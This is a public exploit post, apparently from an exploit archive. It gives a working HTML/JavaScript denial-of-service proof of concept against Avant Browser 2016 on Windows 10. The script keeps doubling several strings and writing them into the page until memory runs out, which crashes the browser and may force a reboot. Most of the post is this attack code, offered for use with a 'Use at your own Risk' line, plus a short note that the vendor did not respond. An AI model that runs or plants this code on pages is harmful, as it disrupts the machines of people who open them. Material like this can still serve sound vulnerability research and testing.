#(+)Exploit Title: Avant Browser Remote DoS Exploit
#(+)Created By: Ajay Gowtham aka AJOXR
#(+)Software : Avant Browser
#(+)Tested On : Win-10-x64
#(+) E-mail : gowtham.ajay5()gmail.com
#About Browser: Avant Browser is an ultra-fast web browser. Its user-friendly interface brings a new level of clarity and efficiency to your browsing experience, and frequent upgrades have steadily improved its reliability.
#Exploit Description : It allows to crash the browser and throttle system usage. Reboot may be required.
------------------------EXPLOIT CODE-------------------------------------
//sploit.html
<html>
<title>Boom</title>
<head>
<h1>Avant Browser 2016 build 17, Stable Release</h1>
<p>Tested only on Windows 10 x64</p>
<p>Use at your own Risk</p>
</p>Exploit: Not Enough Free System Memory DoS Exploit. Perfectely Works Only on Avant Browser 2016</p>
<script>
function dos()
{
var longunistring1 = unescape("%u4141%u4141");
var longunistring2 = unescape("%u4242%u4242");
var longunistring3 = unescape("%u4343%u4343");
var longunistring4 = unescape("%u4444%u4444");
var longunistring5 = unescape("%u4545%u4545");
var longunistring6 = unescape("%u4646%u4646");
var longunistring7 = unescape("%u4747%u4747");
for(i=0; i <= 950 ; ++i)
{
longunistring1+=longunistring1;
longunistring2+=longunistring2;
longunistring3+=longunistring3;
longunistring4+=longunistring4;
longunistring5+=longunistring5;
longunistring6+=longunistring6;
longunistring7+=longunistring7;
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(longunistring5);
document.write(longunistring6);
document.write(longunistring7);
}
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(longunistring5);
document.write(longunistring6);
document.write(longunistring7);
}
</script>
</head>
<body>
<input type="button" value="Pwd!" onclick="dos();">
</body>
</html>
Solution
======
An update will be a solution.
# Contacted vendor, no response for long time.
